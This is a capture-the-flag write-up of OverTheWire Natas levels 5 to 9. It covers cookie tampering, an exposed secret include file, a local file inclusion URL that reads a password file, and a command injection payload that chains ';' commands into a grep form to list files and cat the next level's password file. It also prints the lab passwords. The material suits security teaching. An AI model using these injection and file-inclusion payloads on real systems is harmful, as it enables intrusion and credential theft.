---
title: "Over the Wire NATAS: Levels 5-9"
date: 2020-11-26 16:04:00 -0800
categories: [overthewire, writeup]
tags: [writeup, web, linux, commandinjection]
toc: true
---
## Introduction

This is the second of my writeups for OverTheWire's Natas series of challenges. You can view the first part [here](../posts/otw-natas-0-4/).

## Level 5

Username: natas5

Password: iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

Upon opening the webpage, I see the following message:

> Access disallowed. You are not logged in

There was nothing in the source code so I decided to check the cookies associated with the page. On Firefox/Chrome, this can be done by using the shortcut ``Ctrl+Shift+I`` --> ``Storage`` --> ``Cookies``. 

I see one cookie named ``loggedin`` with a value of 0. From experience, I can make the assumption that 0 = False, therefore 1 would equal True. I change the value of the cookie to 1 and refreshed the page.

The text on the page now shows that I am logged in and presents the flag for the next level.

```
Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1
```

## Level 6

Username: natas6

Password: aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1

Upon opening the webpage, I see that there is a form where I can submit a query. There is also a link to the source code for this form.

This snippet of code looks interesting.

```
<?

include "includes/secret.inc";

    if(array_key_exists("submit", $_POST)) {
        if($secret == $_POST['secret']) {
        print "Access granted. The password for natas7 is <censored>";
    } else {
        print "Wrong secret";
    }
    }
?>
```

It looks like the ``$secret`` variable our input is being compared to comes from the file ``includes/secret.inc``. I naviagte to that web page to find the secret key.

```
<?
$secret = "FOEIUWGHFEEUHOFUOIU";
?>
```

Submitting the value of this variable on the form gives me the password for the next level.

```
Access granted. The password for natas7 is 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9 
```

## Level 7

User: Natas7

Password: 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9 

Upon opening the challenge, I see links to two different pages: ``home`` and ``about``. 

I'll take a look at ``home``. 

There are things that stick out right away. The first thing is that from the source code, there is an interesting HTML comment.

```
<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->
```

The second thing is from the URL of the home page.

```
http://natas7.natas.labs.overthewire.org/index.php?page=home
```

The ``?page=`` parameter shows that this is a ``Local File Inclusion`` challenge. We can specify the path of the file we want to view, so let's view ``/etc/natas_webpass/natas8`` as that is where the password should be.

```
http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8
```

> DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe 

## Level 8

User: Natas8
Password: DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe 

It looks like there is another form where we can submit a query. Let's view the source code again:

```
$encodedSecret = "3d3d516343746d4d6d6c315669563362";

function encodeSecret($secret) {
    return bin2hex(strrev(base64_encode($secret)));
}

if(array_key_exists("submit", $_POST)) {
    if(encodeSecret($_POST['secret']) == $encodedSecret) {
    print "Access granted. The password for natas9 is <censored>";
    } else {
    print "Wrong secret";
    }
}
?>

<form method=post>
Input secret: <input name=secret><br>
<input type=submit name=submit>
</form>
```

Ok, it looks like we have to enter a string that, when passed through the ``encodeSecret`` function, equals the encodedSecret variable in the code.

Three operations are applied to it. First, it is encoded in base64. Second, the string is reversed. Finally, the ``bin2hex`` function is used. I'm not exactly sure what this does, so I google it. 

> Returns an ASCII string containing the hexadecimal representation of str.

Sounds simple enough, if we pass it through a hex value -> ascii representation tool online, we should be able to undo that.

Using [this](https://www.rapidtables.com/convert/number/hex-to-ascii.html) tool, I was able to get the following string:

> ==QcCtmMml1ViV3b

Now, I'll use [this](https://codebeautify.org/reverse-string) tool to reverse the string.

> b3ViV1lmMmtCcQ==

Finally, I'll base64 decode it using [this](https://www.base64decode.org/) tool.

We end up with ``oubWYf2kBq``, which when I submit as the query produces the password needed for level 9.

```
Access granted. The password for natas9 is W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl
```

## Level 9

User: natas9

Password: W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl

We are given a form with the prompt ``Find words containing:``. Let's view the source code.

```
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    passthru("grep -i $key dictionary.txt");
}
?>
```

So it takes whatever we put in the form and throws it into the command ``grep -i $key dictionary.txt``.

We can control whatever is in ``$key``, so we can easily abuse this form. There are several different ways to easily solve it.

I will solve it by absuing this character: ``;``. A semicolon is treated like you pressing the enter key, so it starts a new command.

Knowing that, we can assemble a simple injection to run commands.

```
wordthatwillnotbefound dictionary.txt; ls; grep -i wordthatwillnotbefound
```

If we use this as our query, this is what the server will run:

```
grep -i wordthatwillnotbefound dictionary.txt; ls; grep -i wordthatwillnotbefound dictionary.txt
```

Keeping in mind the first and last commands will not return anything, the output of the command ``ls`` is all that we will see.

This is the output:

```
dictionary.txt
index-source.html
index.php
index.php.tmpl
```

Cool! It works. Looking back at Level 7, we know that the flag for the next challenge will always be stored at ``/etc/natas_webpass/natas<next level>``, in this case the next level is 10, so our injection should reflect that.

```
wordthatwillnotbefound dictionary.txt; cat /etc/natas_webpass/natas10; grep -i wordthatwillnotbefound
```

```
Output:

nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu
```

## Conclusion

So far, all of the changes have been basic but I'm quickly reaching the limits of what I've already known/experienced and seen in previous CTFs. I'm excited to see how the next few levels will play out.